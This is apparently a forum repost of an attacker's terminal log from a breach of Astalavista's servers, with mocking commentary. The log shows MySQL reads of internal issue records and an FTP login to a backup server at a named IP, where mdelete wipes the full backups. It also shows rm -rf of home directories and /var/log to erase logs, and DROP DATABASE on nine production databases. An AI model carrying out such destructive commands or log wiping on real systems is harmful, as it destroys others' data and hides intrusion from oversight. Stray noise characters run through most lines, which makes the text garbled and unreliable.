+——————+———————————————————————————————+6 }  ~  A  I7 u" \0 h% U; ]
| Website guidance | Virtual Girl which guides you trought the website.5 ^% V% ?0 t  J' ]4 X4 T  Q
8 s" x  D  B3 u: ]) G+ V
We need a girl with who you can ( talk )!!!
6 [, ~: B# K1 L# v4 l% MAlso for the News!+ @! h* c# _7 A& R
So my suggestion is a girl who read you the news loud if you like!+ o) e8 x! S& q4 F% z
you can choose between read yourselfe or she read it for you or both!% t* L! k' F' ^

& Y5 f. ~3 j# n) k, bGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
# g1 J. k, z8 K1 E7 T1 [  f' Z4 C6 e3 V- Y, ]
Have a look on the example girls!!
) p# O5 t3 q8 y
, |$ G6 K8 H$ z8 e) N  r4 x链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url], f3 p6 a- t5 w0 ]; Z

- f9 F' C* e. [! t8 L& Aor that
7 K0 D9 c) R( J, d8 @# y
. s9 ]6 S1 }$ L) o$ n# n/ @1 d链接标记[url]http://www.yellostrom.de/[/url]( h  N4 n9 {4 p& [
  _* p; ?1 x; a, c
|
- O; M' b, s! y3 l3 `6 I+——————+———————————————————————————————+! S! o3 n1 ?6 g3 o6 R
1 row in set (0.00 sec), z- g9 ~* K* C, y7 R

9 H4 o- E2 A8 S3 j: B( X: P2 q// ha ha.
7 D# z5 G& |$ h
/ v1 L7 e) g) H) z. h/ ?8 ~. fmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;2 m; z+ G8 C/ r1 R; K. I& l+ H
+————————–+———————————————————————————————————–+* L- Y) H2 ]- f  r
| iss_summary              | iss_description                                                                                           |
* y& p2 s3 _% I. V+ M9 D+————————–+———————————————————————————————————–+
6 e' ^: G# {$ _" _; x! P* ^4 T| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |
' w* y/ m8 C$ y7 {# Q$ b$ g+————————–+———————————————————————————————————–+
5 `* }( Q; r' P5 s9 H1 row in set (0.00 sec)' R* i; D' l5 `

! M) F% k+ G/ J$ b// LOL.. E! u& i+ A7 l0 Y

% d3 ~6 k( c1 {% f  Lmysql> exit
3 B6 E4 {- x* b* {. t' b+ Y8 iBye% }0 e; r2 y: V) O9 t
+ Q) H$ c& W  K) q7 Y
sh-3.2# ftp 212.254.194.163
6 X) s4 x  V2 K3 Q; @Connected to 212.254.194.163.
; s" H% @! H; x+ a1 f6 E220 BackupCOM_VW FTP server ready.
: u2 D) }& j- _0 Z2 h  F" Y/ O504 AUTH: security mechanism ‘GSSAPI’ not supported.
: ]& q, k6 F- V% j5 S( N4 z- \& x; r504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
7 R- x- z* G6 t# XKERBEROS_V4 rejected as an authentication type
$ ]5 m2 f+ M- W) Z/ W' AName (212.254.194.163:root): astalavista.com: H: X3 V' s7 N9 X5 z
331 Password required for astalavista.com.
& U+ J' R6 S. H( {Password:
1 ^1 O0 X! [  o. @% m9 U. ]) y# A230 User astalavista.com logged in.
" j  e' B# A6 ?8 z) PRemote system type is UNIX.
: L( f  |! T5 @- n8 f$ i( q* [* @8 VUsing binary mode to transfer files.' O2 R+ ~3 ^7 S& C# J
ftp> ls -la" b! T" H$ Y* s7 J
227 Entering Passive Mode (212,254,194,163,2,188)
3 @, F: ^* l5 l$ t, R; T150 Opening BINARY mode data connection for ‘file list’.$ B; \7 g4 t8 f' N% Q0 N6 o& n8 |
dr-x——   1 root users         4096 Jun  4 06:13 astalavista.com
( @- N3 V- x$ }226 Transfer complete., ?4 \9 ?0 s$ a% x
ftp> cd astalavista.com- w9 H- Q- u; I# @8 H
250 CWD command successful.* n: S; Y+ s7 L+ ?$ Z
ftp> ls -la# X8 B1 W+ `! h9 X' ?
227 Entering Passive Mode (212,254,194,163,2,189)! R- i4 D1 n4 `
150 Opening BINARY mode data connection for ‘file list’.3 |% q  ~" B) _2 a
-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
7 N5 r, R' Q: C, Q1 q-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
8 l( s2 U! R+ w5 T-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2! I1 ^  s6 X) y6 u1 e+ u1 f5 m4 t
-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar
2 q% Z' O: b6 k+ t-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar4 m. I% b/ i9 r5 Z. {
[snip]: ]7 T7 M! n/ L( ]5 _, n
226 Transfer complete.
6 [  D, J/ D" c1 e  Z$ C! b6 ?ftp> mdelete *, u( S" x- B0 l
ftp> ls -la
0 U. t! ~# W9 B% |6 A3 E/ H- G' W227 Entering Passive Mode (212,254,194,163,2,193)
/ i- a" S- b  f# I150 Opening BINARY mode data connection for ‘file list’.
. o" A( M  Y5 M4 _/ ~8 k  U$ G9 v226 Transfer complete.
0 o- ?1 w% ^$ t" P* G9 iftp>
2 D8 |1 H6 N. F9 Y  g, v# v4 n) M3 u7 I' J- v% A1 o  i1 Z
sh-3.2# cd /home8 t( z$ w+ D& A; @, i7 ^
sh-3.2# ls -la
* x; h* f* Y( y  ototal 1204 T1 L. q# `; }* f
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .5 k( T& i% k: S, `; {' l  z' n9 O7 L
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
( j: N% ]9 U( y+ N. w4 Q4 l* F2 ]drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
5 N4 u. N2 q: ^2 ~+ j-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
* d9 A; r: m+ W& F, H-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user* i- O8 m7 R0 ^6 H  y0 X2 G  E$ E4 ~
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
6 e, o3 a, @5 n( fdrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
% z/ o  R2 e" E: |* Bdrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161' f" w9 C" j1 g! ]9 C
drwx–x–x 10 com     com      4096 Apr 28 12:40 com# X/ ~/ f/ E3 I* p0 h" _
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp0 \4 L& @( N5 ^+ r# W8 f
drwx——  3 jon     jon      4096 Sep 21  2007 jon. E) y8 c( ]* p' H% C
drwx——  2 root    root    16384 Sep 11  2007 lost+found3 _3 i( O( ]! K
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
( u0 q. h$ S7 Hdrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
/ z- s9 o; Z' @/ @* mdrwx——  2 jon     jon      4096 Sep 15  2007 test
: X7 W  z0 C# l+ \  G# W! Odrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp7 x5 A* l1 M! l6 N: y) v# ~

9 D* ^/ e4 {7 e3 M* [sh-3.2# rm -rf backup/
/ Q; j+ X3 z* i8 y5 |% fsh-3.2# rm -rf backup.14161/6 c0 N* I" u4 L
sh-3.2# rm -rf ftp/! j9 h& Z5 M% e) Y$ T
sh-3.2# rm -rf jon// ]  i5 V# K5 f! ~6 e% \: K
sh-3.2# rm -rf my/
- K$ B/ o3 L/ J1 d  k: W% T) ?: ish-3.2# rm -rf mysqldata/3 f# B' q' Y. c5 g5 \% `7 R& {6 U
sh-3.2# rm -rf test/
* z+ c2 J4 w  G& ush-3.2# rm -rf tmp/2 ?/ n& K; q6 t3 F4 ^# Y
sh-3.2# cd ~
% U: F" p2 q( }: `, C! v4 ]0 |sh-3.2# rm -rf *+ j0 D+ f; T! Y# ]! _1 E# n8 r
sh-3.2# rm -rf /var/log/. C; Z* d' I' W% H  c' [. l" X/ |, W
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
9 a/ U8 f- O# m1 J% D& u  S, hsh-3.2# rm -rf /home/*6 m* y( U* ]$ c6 Z" l
sh-3.2# mysql
. d) D: n4 z8 n& E+ _7 s2 w/ V# aWelcome to the MySQL monitor.  Commands end with ; or \g.
& ^$ a6 b- m: g. Q( VYour MySQL connection id is 407156; _' _  `/ g& }& G! l3 o
Server version: 5.0.45-community-log MySQL Community Edition (GPL): s- v# }; K0 t8 n9 C
7 I: i# Z. Z  P1 Z. ?
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 N4 T+ R2 y0 j: i: }: M$ d/ m  f( G0 {# e  H; O0 x. P
mysql> show databases;
5 [( B- ^& W; `- Y, B+———————–+$ P9 Q4 g3 p0 S
| Database              |3 V% {! n3 ]* L# r
+———————–+( A, b3 ~' H5 Y+ A# W
| information_schema    |$ K+ o, G" q- a% `9 p$ N' M
| astanet_ads           |
' i% K  t' x& K% `2 A: d| astanet_mailing_lists |
! @: K9 [6 T0 @, ]* J6 L3 s| astanet_mediawiki     |& t  p6 T8 K, k( s
| astanet_membersystem  |
) c: i) H0 q. s: T| com_contrexx          |
$ d5 b* C( g/ U% R, @; }* L| com_contrexx2         |
3 Q4 V) N* {+ T- |, r" S| com_contrexx2_live    |
3 E9 W8 M/ M) {, D+ a3 _& L7 @| da_roundcube          |
7 y6 y/ h; ]$ J5 t3 m; V| dolphin               |
6 I2 R$ d6 k/ g, ^$ y% q& g| ideapool              |
) e- C( O" }" j4 J: E5 X$ ~( ?| mysql                 |
+ s1 Z. T3 ^) u1 N$ H$ M8 g  L| test                  |2 ?. C! D& R7 a, W" T0 n: F' _
| yourmaster            |
- W. n0 Q' }. r" ?" q- B" y# _+———————–+2 ?" T2 _( _4 C0 p! r! }
14 rows in set (0.03 sec)& }  E% {' i! Z
8 Q7 C: O* f1 [  H' r3 F
mysql> drop database astanet_membersystem;: c0 ]) \+ h( |6 A) [( K; B
droQuery OK, 46 rows affected (0.81 sec)# B' a% N* {) _/ u. j" y8 c

$ ?. Z; O! _# Z$ u: d: b' zmysql> drop database com_contrexx;( l+ k1 Q$ \$ l# Z$ t4 y- V
Query OK, 211 rows affected (2.72 sec)4 T' M7 J( o4 {4 Q8 x( e

0 X3 e# ?7 v( Q7 |2 h* ymysql> drop database com_contrexx2;
. E8 r& W2 B2 c( L) I) vQuery OK, 237 rows affected (2.23 sec)5 m! X9 C4 f' }+ n; y
& Z( k8 ?: ^, q9 M, m( G$ C
mysql> drop database com_contrexx2_live;
" D$ E) y, O8 `; DQuery OK, 227 rows affected (7.63 sec)
5 {) K, n9 ^5 H7 V7 |; m+ I, f- v0 g1 r; L$ s1 i6 T! D
mysql> drop database ideapool;: @0 g( ^, Q# ]9 O( T
Query OK, 69 rows affected (0.19 sec)
" B% G- I7 S+ i; j3 j' G7 m" v! h' m# {& ^4 Z( x
mysql> drop database yourmaster;
+ Z+ @, U- J) B( v+ DQuery OK, 158 rows affected (0.55 sec)# _; J- \# Z7 ^' |

) g" F7 [! Q+ Z( omysql> drop database astanet_ads;
! ^+ O6 F8 Y* ^1 n' vQuery OK, 9 rows affected (0.11 sec)( d$ Y) `2 R/ Z$ O. B7 Q0 B

4 |: `6 ^$ E5 v% }1 v' ^9 @mysql> drop database astanet_mailing_lists;! h) `- I' t  {2 P  O! U( s
Query OK, 24 rows affected (1.47 sec)
$ c) ?; B8 H( A  y2 t4 B, G4 e
1 g8 s8 p$ q, W* f5 O- {mysql> drop database astanet_mediawiki;0 z! m$ d: `: V8 W
Query OK, 31 rows affected (0.51 sec)
+ H5 ]& M9 R8 g5 i# {' ]. C2 Z2 w4 ^* a
mysql> show databases;
3 E  O( l9 C$ y% q+——————–+
9 M1 Y% W$ T' i7 b3 `( ^$ N( C  Z| Database           |6 K( y' B( `! x" F0 V0 T7 y
+——————–+
# A6 e) ]9 D* U7 K, M) U0 i| information_schema |
& X; l6 \5 [3 e' t| da_roundcube       |) W; c% Q: T% u9 @, L
| dolphin            |
  L# ]0 q" g+ d2 k9 Q$ _$ s2 M| mysql              |* P6 {% W& A4 R. c/ p# \, X- A7 A
| test               |3 ~, x& `- j3 b
+——————–+
- t+ y# N) l  \  @3 M- Y5 rows in set (0.00 sec): h8 f/ i7 v* U* a9 A
2 _# {' G- t( z9 c
What a journey! We’re not sure exactly why the “Terminator” had any influence on
1 H' A! X5 \* C! Y6 R  B' etheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the- X- P2 Q+ n- z9 \
wrong to say this pack of morons *wont be back*.: g8 b- h: {$ C8 u+ F9 Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表